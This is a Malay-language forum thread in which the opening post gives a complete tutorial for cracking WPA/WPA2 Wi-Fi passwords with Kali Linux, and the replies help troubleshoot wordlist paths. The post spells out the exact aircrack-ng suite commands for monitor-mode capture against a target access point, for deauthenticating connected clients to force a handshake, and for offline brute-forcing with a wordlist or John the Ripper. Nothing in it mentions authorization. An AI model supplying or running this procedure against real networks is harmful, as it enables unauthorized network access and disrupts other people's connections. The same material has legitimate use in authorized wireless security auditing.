crack wpa/wpa2 password secara manual menggunakan Kali Linux

Discussion in 'Malay Support | Sokongan Melayu' started by comfast98, 28 Sep 2013.

  1. comfast98

    comfast98 Well-Known Member

    Joined:
    24 Jul 2012
    Messages:
    9
    Likes Received:
    5
    Trophy Points:
    65
    Hari ini aku ada masa sedikit jadi aku bercadang untuk membuat satu tutorial untuk crack wpa/wpa2 password secara manual.

    Berikut ada lah cara-cara basic yang perlu korang tahu:
    - Letakkan interface kepada monitor mode
    - Cari wireless network yang diprotect oleh WPA2 dan Pre Shared Key
    - Capture semua packet
    - Tunggu sehingga client muncul dan deauthenticate client tu supaya kita dapat handshake
    - Step terakhir, crack key atau password itu menggunakan dictionary atau John The Ripper.

    Ok, didalam tutorial ini, aku menggunakan Wireless Adapter Alfa Awus036H bersama antenna 9dbi dan juga menggunakan Kali Linux.

    Didalam OS aku menunjukkan adapter aku dikenali sebagai wlan0.
    Pertama sekali, letakkan interface wlan0 kepada monitor mode:
    [​IMG]

    Sekarang monitor mode kita dikenali sebagai mon0.
    Mari kita cari wifi yang protected dengan WPA2 / PSK pula:
    Gunakan command ini:
    root@kali:~# airmon-ng mon0
    [​IMG]

    Hentikan airodump-ng (tekan Ctrl C) dan run kan semula airodump-ng untuk kita fokus kepada satu Access Point (AP) atau target kita sahaja.
    Gunakan command seperti ini:
    root@kali:~# airodump-ng mon0 --channel 6 --bssid 00:11:22:33:44:55 -w /tmp/wpa2
    Dimana :-
    mon0 – mode monitor korang
    --channel 6 – channel wifi target
    --bssid – mac address router target
    -w – path untuk disimpan .cap kita nanti.
    [​IMG]

    Pada masa ini, korang boleh tunggu sehingga kita dapat 4-way handshake ataupun kita boleh deauthenticate client supaya kita dapat mempercepatkan process handshake tadi. Oleh kerana masa itu emas, jadi kita akan deauthenticate client untuk paksa dia reassociate. Kita akan memerlukan bssid AP (-a) dan mac address client yang connect ke AP tersebut (-c).
    Gunakan command ini:
    root@kali:~# aireplay-ng -0 1 -a 00:11:22:33:44:55 -c aa:bb:cc:dd:ee:ff mon0
    [​IMG]
    Gambar diatas menunjukkan aku terpaksa deauthenticate 2 client supaya dapat handshake.

    Sekarang kita dah dapat handshake:
    [​IMG]

    Hentikan airodump-ng (tekan ctrl C) dan pastikan kesemua file telah di save kan.
    root@kali:~# ls /tmp/wpa2*
    -rw-r--r--1 root root 4678704 Jun1810:41 wpa2-01.cap
    -rw-r--r--1 root root 788 Jun1910:41 wpa2-01.csv
    -rw-r--r--1 root root 595 Jun1810:41 wpa2-01.kismet.csv
    -rw-r--r--1 root root 5743Jun1910:41 wpa2-01.kismet.netxml
    *Noted: nama file mungkin berlainan, korang kena tengok apa nama file yang disave tu.

    Start dari point ni, kerja cracking semua adalah offline. Jadi korang boleh la keluar dating ke, minum kopi sambil tengok boboiboy ke. Cracking WPA adalah berdasarkan bruteforce, ini bermakna masa untuk diambil adalah amat panjang dan kesemua berdasarkan dicitonary yang ada. Lagi banyak wordlist lagi lama la nak siap.

    Untuk option pertama, kita akan menggunakan wordlist.
    Jika wordlist korang bernama word.txt dan berada di path /tmp/wordlist, run kan command seperti ini:
    root@kali:~# aircrack-ng –w /tmp/wordlists/word.txt -b 00:11:22:33:44:55 /tmp/wpa2*.cap

    Untuk option kedua pula adalah dengan menggunakan John The Ripper. Cara ini memang boleh berjaya tetapi memakan masa yang lama mungkin selama korang hidup pon belum tentu berjaya, Hahaha.
    Korang boleh gunakan command seperti ini:
    root@kali:~# john --stdout --incremental:all | aircrack-ng -b 00:11:22:33:44:55 -w - /tmp/wpa2*.cap

    Sekian sahaja tutorial pada kali ini, selamat mencuba [​IMG]
     
    #1 comfast98, 28 Sep 2013
    Last edited: 28 Sep 2013
    • Like Like x 1
  2. firesheep

    firesheep Well-Known Member
    Donator I

    Joined:
    10 Jul 2012
    Messages:
    53
    Likes Received:
    8
    Trophy Points:
    120
    terima kasih kongsi tutorial ni bro:)
     
  3. Neogrimjaw

    Neogrimjaw Member

    Joined:
    26 May 2014
    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    6
    hi, can i ask a few question. first is i try cracking wpa2 pass, i almost finish cracking and at the last step need to use this command "aircrack-ng -w wordlist.txt --bssid 00:11... wordlist-01.cap" but it says that my wordlist can't be found. so how i want to check this wordlist or how can i make it.

    second is i try to use this command "wash -i [your interface] [My is wlan0] -c CHANNEL_NUM -C -s" but it only replay ''[!] Found packet with bad FCS, skipping...'' and never stop. can help me please. hope to get this info ASAP
     
  4. Fuggs

    Fuggs Active Member

    Joined:
    4 Apr 2013
    Messages:
    8
    Likes Received:
    0
    Trophy Points:
    41
    i think u need check first file wordlist-01.cap what place u put it?
    example :

    root@kali:~# aircrack-ng –w /tmp*(if u put in tmp file,find what place u put it)/wordlists/word.txt -b 00:11:22:33:44:55 /tmp/wpa2*.cap

    look careful and slow learn and see,fix and error...maybe u try many time file change to -01,02,03....

    if u fail use manual i think better use existing software in xiao os and then need find directory password......
     
  5. grapox

    grapox Active Member

    Joined:
    3 Apr 2013
    Messages:
    1
    Likes Received:
    0
    Trophy Points:
    26
    great broo..thanks
     
Loading...
  • About Us

    We are a community mixed with professionals and beginners with an interest in wireless security, auditing and pentesting. Feel free to check out and upload resources.


    You can also find us on: Twitter and Facebook

  • Donate to Us

    Did you find our forums useful? Feel free to donate Bitcoin to us using the form below. Those who donate the equivlent of $10 USD or more will be upgraded to VIP membership. Don't have Bitcoin? Use your credit card to GO VIP here. Don't want to fork out some coin? There are other ways to GO VIP. Bitcoin: 1LMTGSoTyJWXuy2mQkHfgMzD7ez74x1Z8K